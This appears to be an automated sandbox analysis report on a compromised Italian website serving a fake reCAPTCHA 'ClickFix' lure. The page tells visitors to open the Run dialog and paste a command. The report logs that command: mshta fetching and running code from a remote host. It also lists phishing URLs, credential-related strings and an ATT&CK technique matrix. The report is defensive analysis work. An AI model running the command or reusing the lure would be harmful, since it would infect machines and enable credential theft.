    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1908,i,14487549043313255646,10754558646077735091,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.cipassoitalia.it/"
    Source: unknownProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://solve.jrqr.org/awjxs.captcha?u=21187cdf-b91f-4f27-aae8-45cec9395e7c # ? ''I am not a robot - reCAPTCHA Verification ID: 3943''
    Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6376 CREDAT:9474 /prefetch:2
    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
    Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
    Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6376 CREDAT:75012 /prefetch:2
    Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -- "https://t3.awagama.org/cdn-cgi/phish-bypass?atok=5CxXRy3gIXYBSZxQYjr6WUagwEOFFlA0IN62CHhpDX0-1735922003-0.0.1.1-%2Fmima.mp4"
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=1968,i,17212161193525190570,5009424471447963821,262144 /prefetch:3
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6332 --field-trial-handle=1968,i,17212161193525190570,5009424471447963821,262144 /prefetch:8
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6552 --field-trial-handle=1968,i,17212161193525190570,5009424471447963821,262144 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1908,i,14487549043313255646,10754558646077735091,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6376 CREDAT:9474 /prefetch:2Jump to behavior
    Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -newJump to behavior
    Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6376 CREDAT:75012 /prefetch:2Jump to behavior
    Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -- "https://t3.awagama.org/cdn-cgi/phish-bypass?atok=5CxXRy3gIXYBSZxQYjr6WUagwEOFFlA0IN62CHhpDX0-1735922003-0.0.1.1-%2Fmima.mp4"Jump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -newJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=1968,i,17212161193525190570,5009424471447963821,262144 /prefetch:3Jump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6332 --field-trial-handle=1968,i,17212161193525190570,5009424471447963821,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6552 --field-trial-handle=1968,i,17212161193525190570,5009424471447963821,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: uianimation.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: ieproxy.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: version.dllJump to behavior
    Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: msvcp140.dllJump to behavior
    Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
    Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\Office\16.0\LyncJump to behavior

    Persistence and Installation Behavior

    barindex
    Source: screenshotOCR Text: x e about:blank C.iPASSO. Nel cuore di Ronna, acl cipassaitalia.it Complete these Verification Steps To better prove you are not a robot. please: I. Press & hold the Windows Key + R 2. In the verification window, press Ctrl + V 3. Press Enter on your keyboard to finish. You will observe and agree: am a robot retA9tOiA 10; VERIFY finish verification. x Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. "l am not a robot - reCAPTCHA Verification 10: 3943' Open: 0K 11:33 ENG p Type here to search SG 03/01/2025
    Source: screenshotOCR Text: x e about:blank CiPssa. Nel cuore di Roma, x x a X cipassaitalia.it Complete these Verification Steps To better prove you are not a robot. please: I. Press & hold the Windows Key + R 2. In the verification window, press Ctrl + V 3. Press Enter on your keyboard to finish. You will observe and agree: t a robot VERIFY finish verification. 11:33 ENG p Type here to search SG 03/01/2025
    Source: Chrome DOM: 1.0OCR Text: Complete these Verification Steps To better prove you are not a robot, please: 1. Press & hold the Windows Key C + R 2. In the verification window. press Ctrl + V 3. Press Enter on your keyboard to finish. You will observe and agree: "t am not a robot reCAPIC"A Perform the steps above to finish verification.
    Source: screenshotOCR Text: x e about:blank CiPssa. Nel cuore di Roma, x x a X cipassaitalia.it Complete these Verification Steps To better prove you are not a robot. please: 1. Press & hold the Windows Key : + R. 2. In the verification window, press Ctrl + V 3. Press Enter on your keyboard to finish. You will observe and agree: t a robot VERIFY finish verification. 11:33 ENG p Type here to search SG 03/01/2025
    Source: screenshotOCR Text: x e about:blank CiPAssa. Nel cuore di Ronna, acl cipassaitalia.it Complete these Verification Steps To better prove you are not a robot. please: I. Press & hold the Windows Key + R 2. In the verification window, press Ctrl + V Undo 3. Press Enter on your keyboard to finish. Cut You will observe and agree: Copy Paste am a robot retA9tOiA 10; Delete Select All VERIFY Right to left Reading order finish verification. Run Show Unicode control characters Insert Unicode control character Type the name Opevl E resource, and Wi Reconversion Open: 11:33 ENG p Type here to search SG 03/01/2025
    Source: screenshotOCR Text: x e about:blank C.iPASSO. Nel cuore di Ronna, acl cipassaitalia.it Complete these Verification Steps To better prove you are not a robot. please: I. Press & hold the Windows Key + R 2. In the verification window, press Ctrl + V 3. Press Enter on your keyboard to finish. You will observe and agree: am a robot retA9tOiA 10; Perform the steps above to finish verification. 11:33 ENG p Type here to search SG 03/01/2025
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: Web Data.21.drBinary or memory string: outlook.office365.comVMware20,11696584680t
    Source: Web Data.21.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696584680
    Source: Web Data.21.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696584680p
    Source: Web Data.21.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696584680^
    Source: Web Data.21.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696584680n
    Source: Web Data.21.drBinary or memory string: Interactive Brokers - HKVMware20,11696584680]
    Source: Web Data.21.drBinary or memory string: microsoft.visualstudio.comVMware20,11696584680x
    Source: Web Data.21.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696584680
    Source: mshta.exe, 0000000C.00000002.2411657408.000001A0F655F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2411657408.000001A0F65F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Web Data.21.drBinary or memory string: outlook.office.comVMware20,11696584680s
    Source: mshta.exe, 0000000C.00000002.2411657408.000001A0F6599000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
    Source: Web Data.21.drBinary or memory string: secure.bankofamerica.comVMware20,11696584680|UE
    Source: Web Data.21.drBinary or memory string: Canara Transaction PasswordVMware20,11696584680x
    Source: Web Data.21.drBinary or memory string: account.microsoft.com/profileVMware20,11696584680u
    Source: Web Data.21.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696584680
    Source: Web Data.21.drBinary or memory string: ms.portal.azure.comVMware20,11696584680
    Source: Web Data.21.drBinary or memory string: Canara Transaction PasswordVMware20,11696584680}
    Source: Web Data.21.drBinary or memory string: bankofamerica.comVMware20,11696584680x
    Source: Web Data.21.drBinary or memory string: turbotax.intuit.comVMware20,11696584680t
    Source: Web Data.21.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696584680
    Source: Web Data.21.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696584680
    Source: Web Data.21.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696584680~
    Source: Web Data.21.drBinary or memory string: www.interactivebrokers.comVMware20,11696584680}
    Source: Web Data.21.drBinary or memory string: AMC password management pageVMware20,11696584680
    Source: Web Data.21.drBinary or memory string: trackpan.utiitsl.comVMware20,11696584680h
    Source: Web Data.21.drBinary or memory string: interactivebrokers.comVMware20,11696584680
    Source: Web Data.21.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696584680z
    Source: Web Data.21.drBinary or memory string: tasks.office.comVMware20,11696584680o
    Source: Web Data.21.drBinary or memory string: discord.comVMware20,11696584680f
    Source: Web Data.21.drBinary or memory string: global block list test formVMware20,11696584680
    Source: Web Data.21.drBinary or memory string: netportal.hdfcbank.comVMware20,11696584680
    Source: Web Data.21.drBinary or memory string: dev.azure.comVMware20,11696584680j
    Source: Web Data.21.drBinary or memory string: interactivebrokers.co.inVMware20,11696584680d
    Source: C:\Windows\System32\mshta.exeMemory allocated: page read and write | page guardJump to behavior
    Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Exploitation for Client Execution
    1
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Security Software Discovery
    Remote Services1
    Email Collection
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    1
    Disable or Modify Tools
    LSASS Memory1
    File and Directory Discovery
    Remote Desktop ProtocolData from Removable Media4
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAt1
    DLL Side-Loading
    1
    DLL Side-Loading
    1
    Process Injection
    Security Account Manager13
    System Information Discovery
    SMB/Windows Admin SharesData from Network Shared Drive4
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    DLL Side-Loading
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture5
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
